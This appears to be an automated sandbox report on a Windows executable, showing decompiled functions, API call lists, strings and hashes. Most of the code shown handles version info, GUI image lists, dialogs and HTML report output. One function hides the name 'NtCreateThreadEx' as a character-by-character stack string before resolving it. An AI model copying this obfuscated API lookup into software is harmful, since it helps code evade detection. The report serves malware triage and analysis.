0x0040b0f1
0x0040b0f2
0x0040b0f3
0x0040b0fb
0x0040b0fd
0x0040b0fe
0x0040b11d
0x00000000
0x00000000
0x0040b11d
0x0040b13c
0x0040b151
0x0040b166
0x0040b17b
0x0040b190
0x0040b1a5
0x0040b1ba
0x0040b1cf
0x0040b1d6
0x0040b1d7
0x0040b1d8
0x0040b1de
0x0040b1e3

APIs

GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
??2@YAPAXI@Z.MSVCRT ref: 0040B07E
GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
_snwprintf.MSVCRT ref: 0040B0FE
wcscpy.MSVCRT ref: 0040B128
??3@YAXPAX@Z.MSVCRT ref: 0040B1D8

Strings

CompanyName, xrefs: 0040B180
ProductName, xrefs: 0040B12F
040904E4, xrefs: 0040B122
FileVersion, xrefs: 0040B156
LegalCopyright, xrefs: 0040B1AA
ProductVersion, xrefs: 0040B16B
%4.4X%4.4X, xrefs: 0040B0F3
OriginalFileName, xrefs: 0040B1BF
\VarFileInfo\Translation, xrefs: 0040B0D8
InternalName, xrefs: 0040B195
FileDescription, xrefs: 0040B141

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
API String ID: 1223191525-1542517562
Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A1EF, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040A1EF(struct HINSTANCE__** __esi) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				struct HINSTANCE__* _t27;

				if( *__esi != 0) {
					L3:
					return 1;
				}
				_t27 = LoadLibraryW(L"ntdll.dll");
				 *__esi = _t27;
				if(_t27 != 0) {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_v24 = 0x4e;
					_v23 = 0x74;
					_v13 = 0x65;
					_v12 = 0x61;
					_v18 = 0x74;
					_v17 = 0x65;
					_v22 = 0x43;
					_v14 = 0x72;
					_v11 = 0x64;
					_v21 = 0x72;
					_v10 = 0x45;
					_v9 = 0x78;
					_v20 = 0x65;
					_v19 = 0x61;
					_v16 = 0x54;
					_v15 = 0x68;
					_v8 = 0;
					__esi[1] = GetProcAddress(_t27,  &_v24);
					goto L3;
				}
				return 0;
			}

0x0040a1f8
0x0040a26d
0x00000000
0x0040a26f
0x0040a205
0x0040a20b
0x0040a20d
0x0040a213
0x0040a214
0x0040a215
0x0040a216
0x0040a217
0x0040a219
0x0040a21f
0x0040a223
0x0040a227
0x0040a22b
0x0040a22f
0x0040a233
0x0040a237
0x0040a23b
0x0040a23f
0x0040a243
0x0040a247
0x0040a24b
0x0040a24f
0x0040a253
0x0040a257
0x0040a25b
0x0040a25f
0x0040a269
0x00000000
0x0040a26c
0x0040a271

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
GetProcAddress.KERNEL32(00000000,?), ref: 0040A263

Strings

N, xrefs: 0040A21F
t, xrefs: 0040A223
E, xrefs: 0040A247
r, xrefs: 0040A23B
ntdll.dll, xrefs: 0040A1FA
e, xrefs: 0040A227
r, xrefs: 0040A243
T, xrefs: 0040A257
h, xrefs: 0040A25B
e, xrefs: 0040A24F
d, xrefs: 0040A23F
x, xrefs: 0040A24B
C, xrefs: 0040A237
a, xrefs: 0040A22B
t, xrefs: 0040A22F
e, xrefs: 0040A233
a, xrefs: 0040A253

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
API String ID: 2574300362-1257427173
Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776

Uniqueness

Uniqueness Score: -1.00%

Function 00407F8D, Relevance: 33.1, APIs: 22, Instructions: 137
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00407F8D(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2a8) = _t48;
						__imp__ImageList_SetImageCount(_t48, 0);
						_push( *(_t62 + 0x2a8));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2a8) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2ac) = _t46;
					__imp__ImageList_SetImageCount(_t46, 0);
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
				}
				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
			}

0x00407f9b
0x00407fa3
0x00407fad
0x00407fb9
0x0040802e
0x00408032
0x00408038
0x0040803e
0x00407fbb
0x00407fc9
0x00407fd0
0x00407fe0
0x00407fe5
0x00407ff7
0x00408015
0x0040801b
0x00408021
0x00408021
0x00408051
0x00408051
0x00408059
0x00408065
0x00408069
0x0040806f
0x00408087
0x00408087
0x0040809c
0x004080bb
0x004080d1
0x004080de
0x004080e2
0x004080ea
0x004080fb
0x00408105
0x00408115
0x00408121
0x00408127
0x00408150

APIs

memset.MSVCRT ref: 00407FD0
memset.MSVCRT ref: 00407FE5
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
LoadImageW.USER32 ref: 004080B4
GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
LoadImageW.USER32 ref: 004080D1
ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
GetSysColor.USER32(0000000F), ref: 004080EA
ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
DeleteObject.GDI32(?), ref: 00408121
DeleteObject.GDI32(?), ref: 00408127
SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
String ID:
API String ID: 304928396-0
Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE90, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040ADC0(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}

0x0040ae90
0x0040aeab
0x0040aeb2
0x0040aec0
0x0040aec7
0x0040aecc
0x0040aed3
0x0040aeda
0x0040aee1
0x0040aee1
0x0040aee7
0x0040aeea
0x0040aeed
0x0040aef9
0x0040aefe
0x0040af05
0x0040af07
0x0040af08
0x0040af13
0x0040af18
0x0040af19
0x0040af26
0x0040af2b
0x0040af2b
0x0040af2e
0x0040af34
0x0040af43
0x0040af44
0x0040af4f
0x0040af54
0x0040af55
0x0040af62
0x0040af67
0x0040af70
0x0040af76
0x0040af7a
0x0040af82
0x0040af88
0x0040af8d
0x0040af97
0x0040af9f
0x0040afa5
0x0040afa9
0x0040afb1
0x0040afb7
0x0040afbd

APIs

memset.MSVCRT ref: 0040AEB2
memset.MSVCRT ref: 0040AEC7
wcscpy.MSVCRT ref: 0040AEF9
_snwprintf.MSVCRT ref: 0040AF19
wcscat.MSVCRT ref: 0040AF26
_snwprintf.MSVCRT ref: 0040AF55
wcscat.MSVCRT ref: 0040AF62
wcscat.MSVCRT ref: 0040AF70
wcscat.MSVCRT ref: 0040AF82
wcscat.MSVCRT ref: 0040AF8D
wcscat.MSVCRT ref: 0040AF9F
wcscat.MSVCRT ref: 0040AFB1

Strings

</font>, xrefs: 0040AFAB
<b>, xrefs: 0040AF7C
size="%d", xrefs: 0040AF08
color="#%s", xrefs: 0040AF44
</b>, xrefs: 0040AF99
<font, xrefs: 0040AEF3

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$_snwprintfmemset$wcscpy
String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
API String ID: 3143752011-1996832678
Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D

Uniqueness

Uniqueness Score: -1.00%

Function 00403C03, Relevance: 30.2, APIs: 20, Instructions: 235
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00403C03(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t88;
				void* _t108;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t134;

				_t113 = _t108;
				E00403B3C(_t113);
				E00403B16(_t113);
				DragAcceptFiles( *(_t113 + 0x10), 1);
				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
				 *_t124 = 0x3ea;
				E0040AD85(GetDlgItem(??, ??));
				 *_t124 = 0x3f1;
				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
				E004049D9(_t49, E00405B81(0x259), 0x20);
				E004049D9(_t49, E00405B81(0x25a), 0x40);
				E004049D9(_t116, E00405B81(0x25b), 0x80);
				E004049D9(_t116, E00405B81(0x25c), 0x100);
				E004049D9(_t116, E00405B81(0x25d), 0x4000);
				E004049D9(_t116, E00405B81(0x25e), 0x8000);
				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
				E004049D9(_t62, E00405B81(0x26c), 0);
				E004049D9(_t62, E00405B81(0x26d), 1);
				E004049D9(_t117, E00405B81(0x26e), 2);
				E004049D9(_t117, E00405B81(0x26f), 3);
				_t134 = _t124 + 0x78;
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
				_t119 = 1;
				do {
					_t17 = _t119 + 0x280; // 0x281
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
					_t134 = _t134 + 0xc;
					_t119 = _t119 + 1;
				} while (_t119 <= 9);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
				_t121 = 1;
				do {
					_t21 = _t121 + 0x294; // 0x295
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
					_t134 = _t134 + 0xc;
					_t121 = _t121 + 1;
				} while (_t121 <= 3);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
				_t122 = 0;
				do {
					_t25 = _t122 + 0x2bc; // 0x2bc
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
					_t134 = _t134 + 0xc;
					_t122 = _t122 + 1;
				} while (_t122 <= 0xd);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
				_t123 = 0;
				do {
					_t29 = _t123 + 0x2ee; // 0x2ee
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
					_t134 = _t134 + 0xc;
					_t123 = _t123 + 1;
					_t143 = _t123 - 3;
				} while (_t123 < 3);
				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
				E00403EC3(GetDlgItem, _t113);
				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
				_t88 = E00402D78(_t113, _t143);
				E00402BEE(_t113);
				return _t88;
			}

0x00403c09
0x00403c0c
0x00403c11
0x00403c1b
0x00403c3f
0x00403c4a
0x00403c6e
0x00403c96
0x00403c9a
0x00403ca6
0x00403cb3
0x00403cb8
0x00403cc5
0x00403cca
0x00403cdd
0x00403ce6
0x00403cf8
0x00403d11
0x00403d26
0x00403d3f
0x00403d54
0x00403d6d
0x00403d76
0x00403d88
0x00403d9e
0x00403db0
0x00403db5
0x00403dc4
0x00403dc8
0x00403dc9
0x00403dca
0x00403dda
0x00403ddf
0x00403de2
0x00403de3
0x00403df4
0x00403df8
0x00403df9
0x00403dfa
0x00403e0a
0x00403e0f
0x00403e12
0x00403e13
0x00403e22
0x00403e26
0x00403e28
0x00403e29
0x00403e39
0x00403e3e
0x00403e41
0x00403e42
0x00403e51
0x00403e55
0x00403e57
0x00403e58
0x00403e68
0x00403e6d
0x00403e70
0x00403e71
0x00403e71
0x00403e87
0x00403e8d
0x00403e9e
0x00403ea6
0x00403eaf
0x00403ebc

APIs

Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F

Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34

DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
GetDlgItem.USER32 ref: 00403C2F
SetWindowLongW.USER32 ref: 00403C39

Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16

GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
LoadImageW.USER32 ref: 00403C6A
GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
LoadImageW.USER32 ref: 00403C7F
SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
GetDlgItem.USER32 ref: 00403CB0

Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5

GetDlgItem.USER32 ref: 00403CC2
GetDlgItem.USER32 ref: 00403CD4

Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99

Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02

Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E

GetDlgItem.USER32 ref: 00403D64
GetDlgItem.USER32 ref: 00403DC0
GetDlgItem.USER32 ref: 00403DF0
GetDlgItem.USER32 ref: 00403E20
GetDlgItem.USER32 ref: 00403E4F
SendDlgItemMessageW.USER32 ref: 00403E87
GetDlgItem.USER32 ref: 00403E9B
SetFocus.USER32(00000000), ref: 00403E9E

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
String ID:
API String ID: 1038210931-0
Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59

Uniqueness

Uniqueness Score: -1.00%

Function 00407763, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t153;
				intOrPtr* _t154;
				signed int _t156;
				signed int _t157;
				void* _t159;
				void* _t161;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t153 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t161 = _t159 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
				if(_t87 != 0xffffffff) {
					_push(E0040ADC0(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040B1EC();
					_t161 = _t161 + 0x18;
				}
				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t153;
				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
					while(1) {
						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
						_v12 = _t156;
						_t157 = _t156 * 0x14;
						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t153;
						_t154 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
						E0040ADC0(_v32,  &_v348);
						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
						} else {
							_push( *(_t157 + _v16 + 0x10));
							_push(E0040ADC0(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x68));
							L0040B1EC();
							_t161 = _t161 + 0x14;
						}
						_t109 =  *(_t124 + 0x64);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
						}
						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
						_push( *((intOrPtr*)(_t124 + 0x6c)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x68));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x60)));
						L0040B1EC();
						_t161 = _t161 + 0x28;
						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
							goto L14;
						}
						_t153 = 0;
					}
				}
				L14:
				E00407343(_t124, _a4, L"</table><p>");
				return E00407343(_t124, _a4, L"\r\n");
			}

0x00407763
0x0040776c
0x00407784
0x0040778b
0x00407797
0x00407799
0x0040779b
0x004077a7
0x004077ae
0x004077bd
0x004077c4
0x004077d3
0x004077da
0x004077e1
0x004077e6
0x004077f2
0x004077f5
0x00407804
0x00407805
0x00407810
0x00407812
0x00407813
0x00407818
0x00407818
0x00407825
0x0040782d
0x00407830
0x0040783a
0x00407840
0x00407846
0x00407849
0x00407850
0x0040785e
0x00407864
0x00407867
0x0040786b
0x0040786f
0x00407877
0x0040787a
0x00407885
0x00407892
0x004078a8
0x004078b8
0x004078c5
0x004078ff
0x004078c7
0x004078ca
0x004078dd
0x004078de
0x004078e3
0x004078e8
0x004078eb
0x004078f0
0x004078f0
0x00407906
0x00407909
0x0040790f
0x0040791d
0x00407923
0x0040792d
0x00407932
0x0040793b
0x00407942
0x00407943
0x0040794c
0x00407953
0x00407954
0x00407959
0x0040795c
0x00407961
0x0040796c
0x00407971
0x0040797a
0x00000000
0x00000000
0x00407838
0x00407838
0x0040783a
0x00407980
0x0040798a
0x004079a1

APIs

memset.MSVCRT ref: 00407784
memset.MSVCRT ref: 004077AE
memset.MSVCRT ref: 004077C4
memset.MSVCRT ref: 004077DA
_snwprintf.MSVCRT ref: 00407813
wcscpy.MSVCRT ref: 0040785E
_snwprintf.MSVCRT ref: 004078EB
wcscat.MSVCRT ref: 0040791D

Part of subcall function 0040ADC0: _snwprintf.MSVCRT ref: 0040ADE4

wcscpy.MSVCRT ref: 004078FF
_snwprintf.MSVCRT ref: 0040795C

Strings

 , xrefs: 00407917
<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s, xrefs: 0040778C
nowrap, xrefs: 00407858
<font color="%s">%s</font>, xrefs: 004078DE
<table border="1" cellpadding="5">, xrefs: 0040781B
</table><p>, xrefs: 00407980
bgcolor="%s", xrefs: 00407805

Memory Dump Source

